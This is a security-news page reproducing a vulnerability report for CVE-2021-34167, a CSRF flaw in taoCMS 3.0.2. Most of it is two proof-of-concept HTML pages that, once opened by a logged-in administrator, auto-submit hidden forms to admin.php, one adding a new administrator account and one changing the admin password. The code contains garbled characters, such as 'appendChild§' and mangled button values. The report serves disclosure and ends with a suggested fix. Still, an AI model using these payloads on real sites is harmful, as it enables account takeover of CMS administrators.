Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-34167: There are two CSRF vulnerabilities that can add administrator account and change administrator password · Issue #6 · taogogo/taocms

Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php.

CVE
Open in Source
#csrf#vulnerability#java#php#auth

After the administrator logged in, when he opened following malicious pages, CSRF(Cross Site Request Forgery) vulnerabilities occurred.

poc:

one.html—add a new account which has administrator privileges

<html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement(“form”); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild§; p.submit(); } function csrf_hack() { var fields;

fields += "<input type=’hidden’ name=’name’ value=’test’ />"; fields += "<input type=’hidden’ name=’passwd’ value=’test’ />";
fields += "<input type=’hidden’ name=’auth_level’ value=’admin’ />";
fields += "<input type=’hidden’ name=’auth_cat’ value=’’ />"; fields += "<input type=’hidden’ name=’status’ value=’1’ />"; fields += "<input type=’hidden’ name=’action’ value=’admin’ />"; fields += "<input type=’hidden’ name=’id’ value=’’ />"; fields += "<input type=’hidden’ name=’ctrl’ value=’save’ />"; fields += "<input type=’hidden’ name=’Submit’ value=’��浜¤’ />";

var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html>

After finish this CSRF attack, we can see that a new account has been added.

two.html—change current administrator’s password

<html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement(“form”); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild§; p.submit(); } function csrf_hack() { var fields;

fields += "<input type=’hidden’ name=’pwd’ value=’admin123’ />"; fields += "<input type=’hidden’ name=’action’ value=’user’ />";
fields += "<input type=’hidden’ name=’ctrl’ value=’update’ />";
fields += "<input type=’hidden’ name=’Submit’ value=’¿®�¹!’ />";

var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html>

After that, the administrator’s will change from ‘admin’ to ‘admin123’.

Solution:
Better add a CSRF token or CAPTCHA for each important request.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE